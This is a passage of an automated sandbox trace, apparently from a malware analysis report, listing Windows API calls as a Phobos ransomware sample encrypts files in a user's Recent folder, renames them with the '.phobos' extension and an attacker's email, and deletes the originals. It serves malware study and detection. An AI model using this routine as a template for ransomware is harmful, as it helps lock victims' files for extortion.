pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0200.298] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.298] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.298] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.298] WriteFile (in: hFile=0x100, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.298] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.298] CloseHandle (hObject=0xfc) returned 1 [0200.298] CloseHandle (hObject=0x100) returned 1 [0200.298] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\b3hy_5529BUU.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\b3hy_5529buu.lnk")) returned 1 [0200.299] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.299] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.301] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2609) returned 1 [0200.301] CloseHandle (hObject=0x100) returned 1 [0200.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk")) returned 0x20 [0200.301] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.301] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.301] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.301] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.303] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.303] ReadFile (in: hFile=0x100, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa31, lpOverlapped=0x0) returned 1 [0200.304] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa40, dwBufLen=0xa40 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0xa40) returned 1 [0200.304] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0xa40, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0xa40, lpOverlapped=0x0) returned 1 [0200.305] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0200.305] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.305] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.305] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.305] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.305] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.305] CloseHandle (hObject=0x100) returned 1 [0200.305] CloseHandle (hObject=0xfc) returned 1 [0200.314] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cm9D EYqaX c.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cm9d eyqax c.lnk")) returned 1 [0200.315] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.315] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.316] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=5116) returned 1 [0200.316] CloseHandle (hObject=0xfc) returned 1 [0200.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk")) returned 0x20 [0200.316] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.316] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.316] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.316] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.317] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.317] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.317] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x13fc, lpOverlapped=0x0) returned 1 [0200.319] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1400, dwBufLen=0x1400 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1400) returned 1 [0200.319] WriteFile (in: hFile=0x100, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1400, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1400, lpOverlapped=0x0) returned 1 [0200.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0200.320] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.320] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.320] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.320] WriteFile (in: hFile=0x100, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.320] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.320] CloseHandle (hObject=0xfc) returned 1 [0200.320] CloseHandle (hObject=0x100) returned 1 [0200.320] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\Cmo9R-1XTEaOu4GLH.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cmo9r-1xteaou4glh.lnk")) returned 1 [0200.321] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.321] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.323] GetFileSizeEx (in: hFile=0x100, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=1000) returned 1 [0200.323] CloseHandle (hObject=0x100) returned 1 [0200.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk")) returned 0x20 [0200.323] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x100 [0200.323] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.323] SetFilePointerEx (in: hFile=0x100, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.323] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.324] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa328e8) returned 1 [0200.324] CryptSetKeyParam (hKey=0xa328e8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.324] ReadFile (in: hFile=0x100, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x3e8, lpOverlapped=0x0) returned 1 [0200.325] CryptEncrypt (in: hKey=0xa328e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3f0, dwBufLen=0x3f0 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x3f0) returned 1 [0200.326] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x3f0, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x3f0, lpOverlapped=0x0) returned 1 [0200.327] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32928) returned 1 [0200.327] CryptSetKeyParam (hKey=0xa32928, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.327] CryptEncrypt (in: hKey=0xa32928, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50, dwBufLen=0x50 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x50) returned 1 [0200.327] CryptDestroyKey (hKey=0xa32928) returned 1 [0200.327] WriteFile (in: hFile=0xfc, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x102, lpOverlapped=0x0) returned 1 [0200.327] CryptDestroyKey (hKey=0xa328e8) returned 1 [0200.327] CloseHandle (hObject=0x100) returned 1 [0200.327] CloseHandle (hObject=0xfc) returned 1 [0200.327] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CQ44PQZH.flv.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cq44pqzh.flv.lnk")) returned 1 [0200.482] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.482] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.518] GetFileSizeEx (in: hFile=0xfc, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=8040) returned 1 [0200.518] CloseHandle (hObject=0xfc) returned 1 [0200.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms")) returned 0x20 [0200.518] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.518] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.519] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.519] SetFilePointerEx (in: hFile=0xfc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.519] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.519] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.519] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.519] ReadFile (in: hFile=0xfc, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0x1f68, lpOverlapped=0x0) returned 1 [0200.521] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f70, dwBufLen=0x1f70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x1f70) returned 1 [0200.521] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x1f70, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x1f70, lpOverlapped=0x0) returned 1 [0200.521] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb3c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba8 | out: phKey=0x2c9fba8*=0xa32be8) returned 1 [0200.521] CryptSetKeyParam (hKey=0xa32be8, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.522] CryptEncrypt (in: hKey=0xa32be8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70, dwBufLen=0x70 | out: pbData=0x2f50020*, pdwDataLen=0x2c9fb68*=0x70) returned 1 [0200.522] CryptDestroyKey (hKey=0xa32be8) returned 1 [0200.522] WriteFile (in: hFile=0x124, lpBuffer=0x2f50020*, nNumberOfBytesToWrite=0x122, lpNumberOfBytesWritten=0x2c9fbb0, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesWritten=0x2c9fbb0*=0x122, lpOverlapped=0x0) returned 1 [0200.522] CryptDestroyKey (hKey=0xa32a28) returned 1 [0200.522] CloseHandle (hObject=0xfc) returned 1 [0200.522] CloseHandle (hObject=0x124) returned 1 [0200.522] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\d93f411851d7c929.customdestinations-ms")) returned 1 [0200.523] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2c9fc50 | out: pbBuffer=0x2c9fc50) returned 1 [0200.523] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.524] GetFileSizeEx (in: hFile=0x124, lpFileSize=0x2c9fbf0 | out: lpFileSize=0x2c9fbf0*=2571) returned 1 [0200.524] CloseHandle (hObject=0x124) returned 1 [0200.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk")) returned 0x20 [0200.525] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0200.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x124 [0200.525] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.525] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c9fb90 | out: lpNewFilePointer=0x0) returned 1 [0200.525] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\cyb_du.lnk.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\cyb_du.lnk.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xfc [0200.526] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2c9fb48, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2c9fba4 | out: phKey=0x2c9fba4*=0xa32a28) returned 1 [0200.526] CryptSetKeyParam (hKey=0xa32a28, dwParam=0x1, pbData=0x2c9fc50, dwFlags=0x0) returned 1 [0200.526] ReadFile (in: hFile=0x124, lpBuffer=0x2f50020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2c9fbcc, lpOverlapped=0x0 | out: lpBuffer=0x2f50020*, lpNumberOfBytesRead=0x2c9fbcc*=0xa0b, lpOverlapped=0x0) returned 1 [0200.527] CryptEncrypt (in: hKey=0xa32a28, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f50020*, 